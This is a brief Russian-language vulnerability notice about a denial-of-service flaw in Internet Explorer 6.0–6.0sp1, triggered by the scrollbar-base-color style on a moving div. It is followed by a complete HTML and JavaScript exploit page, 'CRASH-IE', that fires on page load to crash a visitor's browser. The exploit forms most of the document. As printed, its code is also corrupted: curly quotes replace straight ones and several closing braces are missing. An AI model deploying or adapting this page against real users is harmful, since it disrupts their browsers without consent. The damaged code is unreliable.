Программа: Microsoft Internet Explorer 6.0 – 6.0sp1 

Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может вызвать отказ в обслуживании. 
Проблема связанна с некорректной обработкой scrollbar-base-color атрибута div объекта. В результате удаленный атакующий может создать Web страницу, содержащую произвольный код сценария, чтобы аварийно завершить работу браузера пользователя, пытающего просмотреть эту Web страницу. 

Эксплоит: 

<!DOCTYPE HTML PUBLIC «-//W3C//DTD HTML 4.01 Transitional//EN»> 
<html> 
<head> 
<title>CRASH-IE</title> 
<style type=»text/css»> 
html, body { 
overflow-y: hidden; 
scrollbar-base-color: ‘#330066’; 

.crash { 
position:absolute; 
left:200px; 
top:200px; 
width:200px; 

</style> 
<script type=»text/javascript»> 
function galgenfrist() { 
window.setTimeout(‘crashIE();’,1000); 

function crashIE() { 
var moveNode = document.getElementById(«move»); 
if(moveNode) { 
moveNode.style.top = «100px»; 
moveNode.style.left = «200px»; 


</script> 
</head> 
<body onload=»galgenfrist();»> 
<h1>CRASH-IE</h1> 
<div id=»move» class=»crash»> 
<table> 
<tbody> 
<tr> 
<td> 
<textarea></textarea> 
</td> 
</tr> 
</tbody> 
</table> 
</div> 
</body> 
</html>



Оставить мнение